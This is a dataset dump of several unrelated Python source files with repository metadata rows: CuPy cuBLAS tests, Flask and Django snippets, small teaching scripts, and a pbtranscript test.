self.mode.array(self.alpha) cublas.ger(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) def test_geru(self): ref = self.alpha * cupy.outer(self.x, self.y) + self.a if self.mode is not None: self.alpha = self.mode.array(self.alpha) cublas.geru(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) def test_gerc(self): ref = self.alpha * cupy.outer(self.x, self.y.conj()) + self.a if self.mode is not None: self.alpha = self.mode.array(self.alpha) cublas.gerc(self.alpha, self.x, self.y, self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) @testing.parameterize(*testing.product({ 'nk': [(5, 9), (9, 5)], 'transa': ['N', 'T'], 'ordera': ['F', 'C'], 'orderc': ['F', 'C'], 'lower': [0, 1], 'mode': [None, numpy, cupy] })) @_attr.gpu class TestSyrk: _tol = {'f': 1e-5, 'd': 1e-12} def _make_matrix(self, m, n, trans, order, dtype): if trans == 'N': shape = (m, n) else: shape = (n, m) return testing.shaped_random(shape, cupy, dtype=dtype, order=order, scale=1.0) def _trans_matrix(self, a, trans): if trans == 'N': return a return a.T @testing.for_dtypes('fdFD') def test_syrk(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] alpha, beta = 3.0, 2.0 if dtype.char in 'FD': alpha = alpha - 1j * 2.0 beta = beta + 1j * 5.0 n, k = self.nk a = self._make_matrix(n, k, self.transa, self.ordera, dtype) aa = self._trans_matrix(a, self.transa) ref = alpha * aa.dot(aa.T) # beta is used as a placeholder only c = cublas.syrk(self.transa, a, alpha=alpha, beta=beta, lower=self.lower) rr, cc = cupy.asnumpy(ref), cupy.asnumpy(c) if self.lower: rr[numpy.triu_indices_from(rr, 1)] = 0 else: rr[numpy.tril_indices_from(rr, -1)] = 0 rru = rr[numpy.triu_indices_from(rr)] ccu = cc[numpy.triu_indices_from(cc)] rrl = rr[numpy.tril_indices_from(rr)] ccl = cc[numpy.tril_indices_from(cc)] cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol) cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_syrk_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] alpha, beta = 2.3, 1.7 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta + 1j * 2.3 n, k = self.nk a = self._make_matrix(n, k, self.transa, self.ordera, dtype) aa = self._trans_matrix(a, self.transa) m = aa.shape[0] c = self._make_matrix(m, m, 'N', self.orderc, dtype) c0 = cupy.array(c) ref = alpha * aa.dot(aa.T) + beta * c cublas.syrk(self.transa, a, out=c, alpha=alpha, beta=beta, lower=self.lower) rr, c0, cc = cupy.asnumpy(ref), cupy.asnumpy(c0), cupy.asnumpy(c) if self.lower: trii = numpy.triu_indices_from(rr, 1) else: trii = numpy.tril_indices_from(rr, -1) rr[trii] = c0[trii] rru = rr[numpy.triu_indices_from(rr)] ccu = cc[numpy.triu_indices_from(cc)] rrl = rr[numpy.tril_indices_from(rr)] ccl = cc[numpy.tril_indices_from(cc)] cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol) cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'mnk': [(8, 9, 10), (10, 9, 8)], 'transa': ['N', 'T', 'H'], 'transb': ['N', 'T', 'H'], 'ordera': ['C', 'F'], 'orderb': ['C', 'F'], 'orderc': ['C', 'F'], 'mode': [None, numpy, cupy], })) @_attr.gpu class TestGemmAndGeam: _tol = {'f': 1e-5, 'd': 1e-12} def _make_matrix(self, m, n, trans, order, dtype): if trans == 'N': shape = (m, n) else: shape = (n, m) return testing.shaped_random(shape, cupy, dtype=dtype, order=order, scale=1.0) def _trans_matrix(self, a, trans): if trans == 'T': a = a.T elif trans == 'H': a = a.T.conj() return a @testing.for_dtypes('fdFD') def test_gemm(self, dtype): if not (self.mode is None and self.orderc == 'C'): pytest.skip() dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, k = self.mnk a = self._make_matrix(m, k, self.transa, self.ordera, dtype) b = self._make_matrix(k, n, self.transb, self.orderb, dtype) aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = aa.dot(bb) c = cublas.gemm(self.transa, self.transb, a, b) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_gemm_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, k = self.mnk a = self._make_matrix(m, k, self.transa, self.ordera, dtype) b = self._make_matrix(k, n, self.transb, self.orderb, dtype) c = self._make_matrix(m, n, 'N', self.orderc, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = alpha * aa.dot(bb) + beta * c if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cublas.gemm(self.transa, self.transb, a, b, out=c, alpha=alpha, beta=beta) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_geam(self, dtype): if self.orderc != 'F': pytest.skip() dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, _ = self.mnk a = self._make_matrix(m, n, self.transa, self.ordera, dtype) b = self._make_matrix(m, n, self.transb, self.orderb, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = alpha * aa + beta * bb if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) c = cublas.geam(self.transa, self.transb, alpha, a, beta, b) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.for_dtypes('fdFD') def test_geam_out(self, dtype): dtype = numpy.dtype(dtype) tol = self._tol[dtype.char.lower()] m, n, _ = self.mnk a = self._make_matrix(m, n, self.transa, self.ordera, dtype) b = self._make_matrix(m, n, self.transb, self.orderb, dtype) c = self._make_matrix(m, n, 'N', self.orderc, dtype) alpha = 0.9 beta = 0.8 if dtype.char in 'FD': alpha = alpha - 1j * 0.7 beta = beta - 1j * 0.6 aa = self._trans_matrix(a, self.transa) bb = self._trans_matrix(b, self.transb) ref = alpha * aa + beta * bb if self.mode is not None: alpha = self.mode.array(alpha) beta = self.mode.array(beta) cublas.geam(self.transa, self.transb, alpha, a, beta, b, out=c) cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol) @testing.parameterize(*testing.product({ 'shape': [(9, 10), (10, 9)], 'side': ['L', 'R'], 'ordera': ['C', 'F'], 'orderc': ['C', 'F'], })) @_attr.gpu class TestDgmm: _tol = {'f': 1e-5, 'd': 1e-12} def _setup(self, dtype, xdim=1): self.dtype = numpy.dtype(dtype) self.tol = self._tol[self.dtype.char.lower()] self.a = testing.shaped_random(self.shape, cupy, dtype=dtype, order=self.ordera, scale=1.0) if self.side == 'L': xlen = self.shape[0] elif self.side == 'R': xlen = self.shape[1] if xdim == 0: self.x = cupy.array(1.1, dtype=dtype) elif xdim == 1: self.x = testing.shaped_random( (xlen,), cupy, dtype=dtype, scale=1.0) elif xdim == 2: self.x = testing.shaped_random( (xlen, xlen), cupy, dtype=dtype, scale=1.0) @testing.for_dtypes('fdFD') def test_dgmm(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) c = cublas.dgmm(self.side, self.a, self.x) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_out(self, dtype): self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) c = cupy.empty(self.shape, order=self.orderc, dtype=dtype) cublas.dgmm(self.side, self.a, self.x, out=c) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_inplace(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x) cublas.dgmm(self.side, self.a, self.x, out=self.a) cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol) _dgmm_incx_minus_one_hip_skip_condition = [ ('C', 'F', (9, 10), 'R'), ('C', 'F', (10, 9), 'R'), ('F', 'F', (9, 10), 'L'), ('F', 'F', (10, 9), 'L'), ] def _check_dgmm_incx_minus_one_hip_skip_condition(self): return (self.ordera, self.orderc, self.shape, self.side) in \ self._dgmm_incx_minus_one_hip_skip_condition @testing.for_dtypes('fdFD') def test_dgmm_incx_minus_one(self, dtype): if self.orderc != 'F': pytest.skip() if cupy.cuda.runtime.is_hip: if self._check_dgmm_incx_minus_one_hip_skip_condition(): pytest.xfail('HIP dgmm may have a bug') self._setup(dtype) if self.side == 'L': ref = cupy.diag(self.x[::-1]) @ self.a elif self.side == 'R': ref = self.a @ cupy.diag(self.x[::-1]) c = cublas.dgmm(self.side, self.a, self.x, incx=-1) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_x_scalar(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype, xdim=0) ref = self.x * self.a c = cublas.dgmm(self.side, self.a, self.x, incx=0) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol) @testing.for_dtypes('fdFD') def test_dgmm_x_matrix(self, dtype): if self.orderc != 'F': pytest.skip() self._setup(dtype, xdim=2) if self.side == 'L': ref = cupy.diag(cupy.diag(self.x)) @ self.a incx = self.shape[0] + 1 elif self.side == 'R': ref = self.a @ cupy.diag(cupy.diag(self.x)) incx = self.shape[1] + 1 c = cublas.dgmm(self.side, self.a, self.x, incx=incx) cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
35.871674
79
0.547596
3,308
22,922
3.683797
0.069226
0.031594
0.041851
0.057443
0.784753
0.757344
0.715411
0.666749
0.622107
0.594042
0
0.01925
0.299712
22,922
638
80
35.9279
0.739908
0.00445
0
0.576655
0
0
0.02301
0.001008
0
0
0
0
0.055749
1
0.076655
false
0
0.010453
0.003484
0.142857
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
fb3c3876b330f5a1310fa02ca86fedafa73ed588
273
py
Python
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
catalog/bindings/csw/brief_record.py
NIVANorge/s-enda-playground
56ae0a8978f0ba8a5546330786c882c31e17757a
[ "Apache-2.0" ]
null
null
null
from dataclasses import dataclass from bindings.csw.brief_record_type import BriefRecordType __NAMESPACE__ = "http://www.opengis.net/cat/csw/2.0.2" @dataclass class BriefRecord(BriefRecordType): class Meta: namespace = "http://www.opengis.net/cat/csw/2.0.2"
24.818182
58
0.754579
38
273
5.263158
0.552632
0.13
0.16
0.23
0.35
0.35
0.35
0.35
0.35
0.35
0
0.025105
0.124542
273
10
59
27.3
0.811715
0
0
0
0
0
0.263736
0
0
0
0
0
0
1
0
false
0
0.285714
0
0.571429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
348d2d60fb5385e97d0dc27346784f7b73fdadac
331
py
Python
example/demo/book/views.py
iwwxiong/flask_restapi
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
6
2019-04-23T02:18:55.000Z
2019-12-10T13:16:21.000Z
example/demo/book/views.py
dracarysX/flask_scaffold
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
null
null
null
example/demo/book/views.py
dracarysX/flask_scaffold
57fca3bf07d913b31b6b7ef877328b0e07056c39
[ "MIT" ]
3
2019-05-22T06:00:17.000Z
2020-01-14T17:02:35.000Z
#! /usr/bin/env python # -*- coding: utf-8 -*- # flask_restapi import from flask_restapi.views import APIMethodView from .models import Book from .forms import BookForm class BookView(APIMethodView): model = Book paginate_by = 10 context_object_name = 'items' pk_url_kwarg = 'book_id' form_class = BookForm
19.470588
45
0.716012
44
331
5.181818
0.727273
0.105263
0
0
0
0
0
0
0
0
0
0.011236
0.193353
331
16
46
20.6875
0.842697
0.193353
0
0
0
0
0.045455
0
0
0
0
0
0
1
0
false
0
0.333333
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
3492885ac8a900a114a775185286f143d7123ed9
236
py
Python
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
3
2021-12-29T13:03:27.000Z
2021-12-31T20:27:17.000Z
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
2
2022-01-15T13:08:13.000Z
2022-01-18T19:41:07.000Z
data/python/pattern_12/code.py
MKAbuMattar/grammind-api
ccf6e9898f50f9e4c7671abecf65029198e2dc72
[ "MIT" ]
null
null
null
#MAIN PROGRAM STARTS HERE: num = int(input('Enter the number of rows and columns for the square: ')) for x in range(0, num): i = x + 1 for y in range(0, num): print ('{} '.format(i), end='') i += num print()
26.222222
73
0.555085
39
236
3.358974
0.666667
0.10687
0.122137
0.167939
0
0
0
0
0
0
0
0.017857
0.288136
236
9
74
26.222222
0.761905
0.105932
0
0
0
0
0.265403
0
0
0
0
0
0
1
0
false
0
0
0
0
0.285714
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
349c048a588296bb67dea9d1d337e93b39772ac1
381
py
Python
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
03_Avanzado/09_CursoBasico_Python/codigo/funciones.py
LeoSan/CarreraFundamentosProgramacion_Platzi_2021
9db6ac33a755f855fbb9c41a9bd0e02712f37cb3
[ "MIT" ]
null
null
null
#Programa ejemplo para usar función #funcion sin parametros def imprimir_mensaje(): print("Mensaje especial:") print("Estoy aprendiendo:") imprimir_mensaje() #funcion con parametros valorA= "Hola mundo" valorB= "Función con parametros" def imprimir_mensaje_param(mensaje1, mensaje2): print(mensaje1) print(mensaje2) imprimir_mensaje_param(valorA, valorB)
20.052632
47
0.755906
44
381
6.409091
0.522727
0.212766
0.148936
0.198582
0
0
0
0
0
0
0
0.012384
0.152231
381
18
48
21.166667
0.860681
0.207349
0
0
0
0
0.22408
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.4
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34a22dd4ad9ab46d6938c8ba8be9e6f6b3432bf1
497
py
Python
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
quickkart_api/auth.py
envaleed/quick-kart-api-deploy
2b962dce3bc5ba19d4e90cb86822c016d51f65c2
[ "MIT" ]
null
null
null
from quickkart_api import app from quickkart_api.models import Users from flask_jwt import JWT, jwt_required, current_identity from flask import abort def authenticate(username, password): user = Users.query.filter_by(username=username).first() if user and user.check_password(password): return user return abort(500, "Authentication failed") def identity(payload): return Users.query.filter(Users.id == payload['identity']).scalar() jwt = JWT(app,authenticate,identity)
33.133333
71
0.7666
67
497
5.58209
0.477612
0.069519
0.085562
0
0
0
0
0
0
0
0
0.007009
0.138833
497
15
72
33.133333
0.866822
0
0
0
0
0
0.058233
0
0
0
0
0
0
1
0.166667
false
0.166667
0.333333
0.083333
0.75
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
34a3c5979c5216c22bb261f3a724f1a3a6ea121a
799
py
Python
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
null
null
null
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
1
2021-06-02T04:45:16.000Z
2021-06-02T04:45:16.000Z
corehq/apps/smsforms/util.py
rochakchauhan/commcare-hq
aa7ab3c2d0c51fe10f2b51b08101bb4b5a376236
[ "BSD-3-Clause" ]
null
null
null
from dimagi.utils.couch import CriticalSection from corehq.apps.receiverwrapper.util import submit_form_locally def form_requires_input(form): """ Returns True if the form has at least one question that requires input """ for question in form.get_questions([]): if question["tag"] not in ("trigger", "label", "hidden"): return True return False def process_sms_form_complete(session, form): result = submit_form_locally(form, session.domain, app_id=session.app_id, partial_submission=False) session.submission_id = result.xform.form_id session.mark_completed(True) session.save() def critical_section_for_smsforms_sessions(contact_id): return CriticalSection(['smsforms-sessions-lock-for-contact-%s' % contact_id], timeout=5 * 60)
30.730769
103
0.738423
107
799
5.308411
0.570093
0.035211
0.059859
0
0
0
0
0
0
0
0
0.004491
0.163955
799
25
104
31.96
0.845808
0.08761
0
0
0
0
0.081346
0.051893
0
0
0
0
0
1
0.214286
false
0
0.142857
0.071429
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
34d35a78f92c8bdc372877964e8913cfb9da9911
197
py
Python
Areatriangulo.py
ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
1
2021-04-22T12:34:37.000Z
2021-04-22T12:34:37.000Z
Areatriangulo.py
ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
null
null
null
Areatriangulo.py
ChristianSalas1234567/salas-yupanqui
36fdbe3ebc51cd73f62870fcc8b646ad98133ae7
[ "Apache-2.0" ]
null
null
null
#variables de entrada print("area del triangulo") #datos de entrada B=int(input("ingrese base:")) H=int(input("ingrese haltura:")) #proceso area=(B*H)/2 #datos de salida print("el area es: ", area)
21.888889
32
0.71066
33
197
4.242424
0.606061
0.128571
0.214286
0
0
0
0
0
0
0
0
0.005714
0.111675
197
9
33
21.888889
0.794286
0.294416
0
0
0
0
0.433824
0
0
0
0
0
0
1
0
false
0
0
0
0
0.4
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34e3c30f1eecc4a83cc074f6ae2e470a42d8d132
1,058
py
Python
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
null
null
null
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
7
2020-06-05T20:53:27.000Z
2022-03-11T23:47:12.000Z
cride/users/models/exchanges.py
albertoaldanar/betmatcherAPI
c0590025efd79f4e489f9c9433b17554ea6ba23f
[ "MIT" ]
null
null
null
from django.db import models #Utilities from cride.utils.models import BetmatcherModel class Exchange(BetmatcherModel): user = models.ForeignKey( "users.User", on_delete = models.CASCADE, related_name = "user" ) prize = models.ForeignKey( "users.Prize", on_delete = models.CASCADE, related_name = "prize" ) adress = models.CharField(max_length = 60, blank = True, null = True) phone = models.CharField(max_length = 25, blank = True, null = True) email = models.CharField(max_length = 25, blank = True, null = True) cp = models.CharField(max_length = 25, blank = True, null = True) country = models.CharField(max_length = 25, blank = True, null = True) city = models.CharField(max_length = 25, blank = True, null = True) full_name = models.CharField(max_length = 55, blank = True, null = True) state = models.CharField(max_length = 25, blank = True, null = True) date = models.DateTimeField( "event_date", help_text = "Date of the event" ) def __str__(self): return self.user.username
28.594595
74
0.6862
138
1,058
5.123188
0.355072
0.169731
0.203678
0.27157
0.455446
0.455446
0.364922
0.364922
0.364922
0
0
0.018868
0.198488
1,058
36
75
29.388889
0.814858
0.008507
0
0.074074
0
0
0.054441
0
0
0
0
0
0
1
0.037037
false
0
0.074074
0.037037
0.592593
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34e7cf6e1775685d6271aef6702b1730ac2e95bc
1,956
py
Python
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
null
null
null
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
null
null
null
tests/unit/test_bad_cluster.py
ylipacbio/pbtranscript
6b4ef164f191ffd4201feb62b951d9eeac3315b6
[ "BSD-3-Clause" ]
1
2021-02-26T10:08:09.000Z
2021-02-26T10:08:09.000Z
# XXX verification for bug 30828 - runs ice_pbdagcon on a spurious cluster # and checks that it discards the resulting all-N consensus sequence import subprocess import tempfile import unittest import os.path as op from pbcore.io import FastaReader CLUSTER_FA = """\ >m54007_151222_230824/47383194/334_64_CCS CATTGAAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTTTC >m54007_151222_230824/28640158/287_60_CCS CAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGGCGTAAACATGGTGGGAACGTACTTTGACTGCGCTGCAAGAAATGGGTTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAAAACAAACATCATTCGCTGGATTTAGACTACTACTGCACGACCGACGTCGACACAAGACATTCTCTGAAAGGTAATTGACGTGGACGTTTC >m54007_151222_230824/49611437/382_58_CCS ACTGAACTACGGGTCAGCTTCCCCATTTGAAGTCATGTAGTGGTTGTCTACTTTTTCATTGAGACGTCCACCTCAACGCTATGAACGTTAGTTGAGACAATGTTAAAGCAAACGACAACGTCATTGTGATCTACATACACAGTGGATGGTTAGCGTAAACATGGTGGAACGTACTTTGACTGCGCTGCAAGAAATGGTGTGGGTCGATCGTAATGCTAGTCGTTACATCGGAACAAGCCAAAACAAAATCATTCGCTGGATTTAGACCTACTGCACGACGACGTCGACACAAGACATTCTTGAAAGGTAATTGACGTGGACGTT""" class TestBadCluster(unittest.TestCase): def setUp(self): self.cluster_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name with open(self.cluster_fa, "w") as fa_out: fa_out.write(CLUSTER_FA) def test_ice_pbdagcon_bad_cluster(self): out_fa = tempfile.NamedTemporaryFile(suffix=".fasta").name prefix = op.splitext(out_fa)[0] args = [ "python", "-m", "pbtranscript.ice_pbdagcon", self.cluster_fa, prefix, "c5006" ] assert subprocess.call(args) == 0 with FastaReader(out_fa) as fa_out: self.assertEqual(len([rec for rec in fa_out]), 0) if __name__ == "__main__": unittest.main()
44.454545
327
0.812883
152
1,956
10.210526
0.559211
0.028995
0.034794
0.043814
0.055412
0.055412
0
0
0
0
0
0.059965
0.130368
1,956
43
328
45.488372
0.85244
0.071063
0
0
0
0
0.557088
0.534473
0
0
0
0
0.064516
1
0.064516
false
0
0.16129
0
0.258065
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
34f18dca2b35de2acae03f31c1e789e6be8e839f
756
py
Python
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
mwthesaurus/model.py
PederHA/mwthesaurus
c58d9bdf82fce906c8a2c908b803b2a9db4bc0a2
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field from typing import List from itertools import chain @dataclass class Word: word: str wordtype: str shortdef: List[str] = field(default_factory=list) synonyms: List[str] = field(default_factory=list) antonyms: List[str] = field(default_factory=list) stems: List[str] = field(default_factory=list) @classmethod def from_response(cls, r: dict) -> object: obj = cls.__new__(cls) obj.word = r["meta"]["id"] obj.wordtype = r["fl"] obj.shortdef = r["shortdef"] obj.synonyms = list(chain.from_iterable(r["meta"]["syns"])) obj.antonyms = list(chain.from_iterable(r["meta"]["ants"])) obj.stems = r["meta"]["stems"] return obj
30.24
67
0.640212
98
756
4.826531
0.357143
0.059197
0.10148
0.160677
0.363636
0.363636
0
0
0
0
0
0
0.218254
756
24
68
31.5
0.800338
0
0
0
0
0
0.054233
0
0
0
0
0
0
1
0.047619
false
0
0.142857
0
0.571429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
34f87e0983bc87b776a41bf8fa6bd6191f64154d
437
py
Python
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
exemplo_47_inspect.py
alef123vinicius/Estudo_python
30b121d611f94eb5df9fbb41ef7279546143221b
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Feb 16 15:35:53 2021 @author: alef """ import os.path # modulo de instropecção amigável import inspect print('Objeto: ', inspect.getmodule(os.path)) print('Classe?', inspect.isclass(str)) # Lista todas as funções que existem em os.path print('Membros: ') for name, struct in inspect.getmembers(os.path): if inspect.isfunction(struct): print(name)
17.48
48
0.681922
63
437
4.730159
0.746032
0.080537
0.073826
0
0
0
0
0
0
0
0
0.038674
0.171625
437
25
49
17.48
0.78453
0.393593
0
0
0
0
0.094118
0
0
0
0
0
0
1
0
true
0
0.25
0
0.25
0.5
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
1
0
2